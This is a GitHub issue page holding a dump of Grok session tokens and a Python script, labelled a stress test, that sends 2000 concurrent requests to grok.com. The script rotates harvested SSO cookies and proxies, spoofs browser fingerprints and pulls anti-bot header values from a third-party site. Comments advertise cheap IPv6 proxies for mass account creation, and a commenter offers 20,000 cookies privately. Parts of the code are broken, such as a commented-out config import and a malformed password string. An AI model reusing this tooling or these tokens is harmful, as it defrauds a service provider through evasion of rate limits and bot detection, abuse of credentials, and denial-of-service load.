-
Notifications
You must be signed in to change notification settings - Fork 1
Description
azureuser@taiwan_not_a_country:~$ head sso_cookies.txt -n 20
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMzQzMjYxOGYtYzZmNi00YzI1LTk5ZWUtMTE0YzBiZjU0YmQzIn0.9izGRII9Ssd9SLoDhnwfaFnsGQse7kpDW6tF9wuAEX4
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiNmY4MmVjZjQtOTI5Mi00NGJjLTljYmYtNGExODQ2YWExYTE0In0.ZdkWyvogOzAQn1VTlAdwXfR7o8HinwQEWTVk3TTZEVU
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiNDFmNmMwZmItNjU4NC00ZDJkLTljN2ItYzQwNGUzZmE0MGU1In0.Jf8o8cpji94PQPnKzkskuYKVZdfcQzApMP3MN6AWOBU
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiNGQ5YjkzMTItMzNjNC00Zjc3LWIwZDUtYjQzMjcyNzA1NDlmIn0.7ZF10vsAKEIflwDaADiaOcN5JOkDf6tc36qttzFDCcE
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiYWQ4MmNlOGUtNDA3MC00YTg1LWI2MjYtOWMwYzI3NDNiOGQwIn0.VEsUgNidDCU5bg-VfIhMtn57psDWFTm-_Php3QEf_a4
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiYmU2Nzk1NzQtMzNmNy00NzEzLTllZWEtNGIyODdjZTY2MTU1In0.zn1zItYHDJcZQ4u1o5RYo2168F8_d4nnodSJ2LKGSP4
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiNDMzNDJmNTMtZTc0YS00ZGViLWIzZGEtYWE0NTZjNDVkMTdkIn0.L7MmnMPwHZpbCoSdPHL2XL-xMTOBFjysFLwUajqMcrQ
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiYWRhM2NjOTYtNTIyMC00MGE0LTg1MmUtOWVlNmViM2M4NTM5In0.M2mTACO5H46CCWRhTJtANy1C0kA_0eLmozXDknixoHg
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMDM0ZDFiMGMtMTk3Ny00NTRlLTk1MjItZTdkM2YwYmRhNzFlIn0.Kgmm1CEwuLH76Stqv5wKJ76llom2JdPk5Lt4xp7PC14
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMWY2OGFiMmYtMmI3MS00ODM3LWI1NmYtYWQ2MTNjNTBmMzRiIn0.da_gJKtMIMD-2kZdfjtMGQ5cZ61VzjKWbzo9D7277Gg
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiOTljMzdmNjgtMzhhNi00OTkyLThmOGItOWQ5MDc0YjE5YmY0In0.igDf3IZI6H_GJQRJUH6z2skVWfwMzTCdwF7tCk-1SCQ
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiNjBmMjVjZTUtMGRiZS00NmJkLWJmNTEtYmJlMzhmOGY5ZTViIn0.uM45wVJXZeiQBcMCfKdSeEJNK9RwwLCWfomoz0osnq4
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiZWM4YWM4NDAtZTQ4OC00YzExLWE1MWUtOTc1ZDEwNGQ4NTc1In0.hJf4-qWlA3dpwGjvjGIWHHp1XGPDQfXqjyDxRrDemd0
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMjBiOWZlYTMtNmU5Yy00ODdmLTg0YzktZmM2NjRlZGFlMTRmIn0.HHoafqux29189hRomyv9JS10eIabxQAL-4YyTO5uUXY
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMzkyY2FmMmEtZDRjYS00NmZmLWI0OTAtYmY3ZmJlZGZjYzllIn0.wHq06lcEPpxPywB7cybz81N5greeQRxk85QA8pkPCK0
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiZGY0ODgzN2MtZWQ1Ni00YzdkLWEyM2UtYTc4MDMzOWRlMzI4In0.ft-CMvqcXTruPKbOGpmLDWMk9Dlz1ONSQqrMP9qiVKg
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMjQ2MzZmMzktODI1Zi00NzZlLWFkMTctMWVhMzYwNzBhOGU4In0.nJXGoREcccnjxmXQNcpmcFvTCADrW2P1twn0g-TLk40
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiN2EwOWY4OGItZGU2MS00NDNjLWE2NTAtYzJkYWFkNjJjOGUzIn0.paMl8GbHuYoMfv0TC_8gUqINtvGllO4UJKMqqYbRmEk
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiM2I0MTRlYTktZDY3Ny00ZTE5LWI3YjMtN2Q3NDVhYTA3MzgzIn0.VSiZDWmcoAEqVP4rZg_T19HyfRyvoFm7z1kMqJW-c6M
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzZXNzaW9uX2lkIjoiMjljMzI3YWQtN2Q3YS00ZTgyLWI2OTUtMDhiZTNjMjBlYzg4In0.v8O8KgQ-GnTA89_XZ8qZaSGhTv0tcD3-a0xMMEtTU6s
py
# stress test on grok api
import json
import uuid
import asyncio
import base64
from typing import Optional, Tuple
import random
import numpy as np
import string
import requests
from curl_cffi import AsyncSession
#import config
#from config import GROK_ASSETS_URL, GROK_CONVO_URL, GROK_POST_URL, GROK_UPLOAD_URL
# Base URLs for grok.com API
GROK_UPLOAD_URL = "https://grok.com/rest/app-chat/upload-file"
GROK_POST_URL = "https://grok.com/rest/media/post/create"
GROK_CONVO_URL = "https://grok.com/rest/app-chat/conversations/new"
GROK_ASSETS_URL = "https://assets.grok.com"
# ============================================================================
# Configuration
# ============================================================================
MAX_WORKERS = 20 # Maximum concurrent tasks
TOTAL_TASKS = 2000 # Total number of tasks to execute
# ============================================================================
# Utility Functions
# ============================================================================
async def get_statsig_id(proxies: Optional[dict] = None) -> str:
"""Fetch a random x_statsig_id from API (async)."""
loop = asyncio.get_event_loop()
return await loop.run_in_executor(
None,
lambda: requests.get("https://rui.soundai.ee/x.php", proxies=proxies, timeout=5).json()["x_statsig_id"]
)
def random_string(length: int = 8) -> str:
"""Generate a random alphanumeric string of given length."""
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
# ============================================================================
# Grok API Functions
# ============================================================================
async def generate_async(
convo_url: str,
cookies: dict,
proxies: Optional[str] = None,
) -> dict:
"""
Send async request to Grok API and stream response.
Args:
convo_url: Grok conversation endpoint URL
cookies: Authentication cookies
proxies: Proxy configuration dict
Returns:
Last response chunk as dict
"""
statsig_id = await get_statsig_id(proxies)
headers = {
"x-statsig-id": statsig_id,
"x-xai-request-id": str(uuid.uuid4()),
}
payload = {
'temporary': False,
'modelName': 'grok-4',
'message': f'''You are an expert Python programmer. Your task is to first decode and then complete the Python program and pass all tests. The content within the angle brackets (<>) represents a number in a specific base. The content within the parentheses () immediately following indicates the value of that base. This correspond to an ASCII encoding of a character.
### Format: You will use the following starter code to write the solution to the problem and enclose your code within delimiters. Don't forget to specify it's PythonSix points $A, think harder {random_string()}, C, D, E$ and $F$ lie in a straight line in that {random_string()}. Suppose that $G$ is a point not on the line and that $AC = {random_string()}, $BD = {random_string()}/22$, $CE = 31$, $DF = 33$, $AF = 73$, $CG = 40$, and $DG = 30$. Find the area of $\\\\triangle BGE$''',
'fileAttachments': [],
'imageAttachments': [],
'disableSearch': False,
'enableImageGeneration': True,
'returnImageBytes': False,
'returnRawGrokInXaiRequest': False,
'enableImageStreaming': True,
'imageGenerationCount': 2,
'forceConcise': False,
'toolOverrides': {},
'enableSideBySide': True,
'sendFinalMetadata': True,
'isReasoning': False,
'webpageUrls': [],
'disableTextFollowUps': False,
'responseMetadata': {
'modelConfigOverride': {
'modelMap': {},
},
'requestModelDetails': {
'modelId': 'grok-4',
},
},
'disableMemory': False,
'forceSideBySide': False,
'modelMode': 'MODEL_MODE_EXPERT',# <--- lol
'isAsyncChat': True,
'disableSelfHarmShortCircuit': False,
}
last_response = {}
async with AsyncSession() as session:
resp = await session.post(
GROK_CONVO_URL,
data=json.dumps(payload),
impersonate="chrome136",
stream=True,
cookies=cookies,
proxies=proxies,
headers=headers,
)
buffer = ""
async for chunk in resp.aiter_content():
buffer += chunk.decode("utf-8")
while buffer:
buffer = buffer.lstrip()
if not buffer:
break
try:
obj, idx = json.JSONDecoder().raw_decode(buffer)
response = obj.get("result", {}).get("response", {})
print(response)
last_response = response
if "responseId" in response:
break
buffer = buffer[idx:]
except json.JSONDecodeError:
break
return last_response
async def upload_file(
proxies: Optional[str],
payload: dict,
cookies: dict
) -> Tuple[str, str]:
"""
Upload file to grok.com and create media post.
Args:
proxies: Proxy configuration
payload: File upload payload with fileName, fileMimeType, content
cookies: Authentication cookies
Returns:
Tuple of (media_url, post_id)
"""
async with AsyncSession() as session:
# Step 1: Upload file
resp = await session.post(
GROK_UPLOAD_URL,
cookies=cookies,
json=payload,
proxies=proxies,
impersonate="chrome133a",
)
print("Upload Status:", resp.status_code)
print("Upload Response:", resp.text)
resp.raise_for_status()
file_uri = resp.json().get("fileUri")
if not file_uri:
raise ValueError("File URI not found in response")
# Step 2: Create media post
json_data = {
"mediaType": "MEDIA_POST_TYPE_IMAGE",
"mediaUrl": f"{GROK_ASSETS_URL}/{file_uri}",
}
resp = await session.post(
GROK_POST_URL,
cookies=cookies,
json=json_data,
proxies=proxies,
impersonate="chrome133a",
)
resp.raise_for_status()
post = resp.json().get("post", {})
return post.get("mediaUrl"), post.get("id")
# ============================================================================
# Fast Pool Management (Lock-free for reads)
# ============================================================================
class FastPool:
"""Lock-free pool for fast concurrent access."""
def __init__(self, items: list):
self.items = items.copy()
self.lock = asyncio.Lock()
self.semaphore = asyncio.Semaphore(len(items))
async def acquire(self):
"""Get an item from the pool (fast, minimal locking)."""
await self.semaphore.acquire()
async with self.lock:
if not self.items:
raise ValueError("Pool is empty")
# Pop from end is O(1) vs random index O(n)
return self.items.pop()
async def release(self, item):
"""Return an item to the pool."""
async with self.lock:
self.items.append(item)
self.semaphore.release()
def size(self):
"""Get current pool size (not thread-safe but useful for debugging)."""
return len(self.items)
# ============================================================================
# SSO Cookie Pool
# ============================================================================
sso_pool = FastPool(config.SSO_COOKIES.copy())
async def get_sso_cookie() -> dict:
"""Acquire an SSO cookie from the pool."""
cookie = await sso_pool.acquire()
# Ensure it's returned as a dict format that curl_cffi expects
if isinstance(cookie, str):
return {"sso": cookie}
return cookie
async def release_sso_cookie(cookie: dict) -> None:
"""Return an SSO cookie to the pool."""
# Extract the actual cookie value if it's wrapped in a dict
actual_cookie = cookie.get('sso') if isinstance(cookie, dict) and 'sso' in cookie else cookie
await sso_pool.release(actual_cookie)
# ============================================================================
# Proxy Pool
# ============================================================================
def build_proxy_pool(ip_list: list, port_range: Tuple[int, int], user: str, password: str) -> list:
"""Build a pool of proxy URLs from IP list and port range."""
pool = []
for ip in ip_list:
for port in range(port_range[0], port_range[1] + 1):
proxy_url = f"http://{user}:{password}@{ip}:{port}"
pool.append(proxy_url)
return pool
# Initialize proxy pool
proxy_list = build_proxy_pool(
ip_list=["89.117.94.75"],
port_range=(30001, 30099),
user="z",
password="GET YOUR OWN PROXIES " I use https://www.ethernetservers.com/ 3dollas plan and
./ipv6-proxy-server.sh -s 64 -c 400 -u z -p zero3 -t http -r 5
(free /64 ipv6 great for account creation too )
)
proxy_pool = FastPool(proxy_list)
async def get_proxy() -> str:
"""Acquire a proxy from the pool."""
return await proxy_pool.acquire()
async def release_proxy(proxy: str) -> None:
"""Return a proxy to the pool."""
await proxy_pool.release(proxy)
# ============================================================================
# Worker & Main Execution
# ============================================================================
async def worker(semaphore: asyncio.Semaphore, task_id: int) -> Optional[dict]:
"""
Execute a single Grok API task with proxy and cookie management.
Args:
semaphore: Concurrency control semaphore
task_id: Unique identifier for this task
Returns:
Result dict or None if task fails
"""
# Wait for a worker slot to become available FIRST
async with semaphore:
# Now acquire resources (only MAX_WORKERS will do this at once)
proxy_url = await get_proxy()
cookies = await get_sso_cookie()
proxies = {"http": proxy_url, "https": proxy_url}
print(f"[Task {task_id}] Started with proxy: {proxy_url}")
try:
result = await asyncio.wait_for(
generate_async(
proxies=proxies,
convo_url="https://grok.com/rest/app-chat/conversations/new",
cookies=cookies,
),
timeout=200
)
print(f"[Task {task_id}] โ Finished successfully")
return result
except asyncio.TimeoutError:
print(f"[Task {task_id}] โ Timed out")
return None
except Exception as e:
print(f"[Task {task_id}] โ Failed: {e}")
return None
finally:
# Always release resources
await release_proxy(proxy_url)
await release_sso_cookie(cookies)
async def main():
"""
Main execution function - launches tasks with concurrency control.
"""
print(f"๐ Launching {TOTAL_TASKS} tasks with max_workers={MAX_WORKERS}...")
print(f"๐ Available proxies: {proxy_pool.size()}")
print(f"๐ Available cookies: {sso_pool.size()}")
# Create semaphore for concurrency control
semaphore = asyncio.Semaphore(MAX_WORKERS)
# Create and launch ALL tasks at once
tasks = [
asyncio.create_task(worker(semaphore, i + 1))
for i in range(TOTAL_TASKS)
]
# Wait for completion
results = await asyncio.gather(*tasks, return_exceptions=True)
successful = sum(1 for r in results if r is not None and not isinstance(r, Exception))
print(f"\nโ
Completed: {successful}/{TOTAL_TASKS} tasks successful")
return results
if __name__ == "__main__":
asyncio.run(main())```
Activity
Mahkhmood8 commentedon Oct 26, 2025
in a private manner I can give you access to all of my sso_cookies
which is 20k -- I only ran the sso generator for like 6 hours lol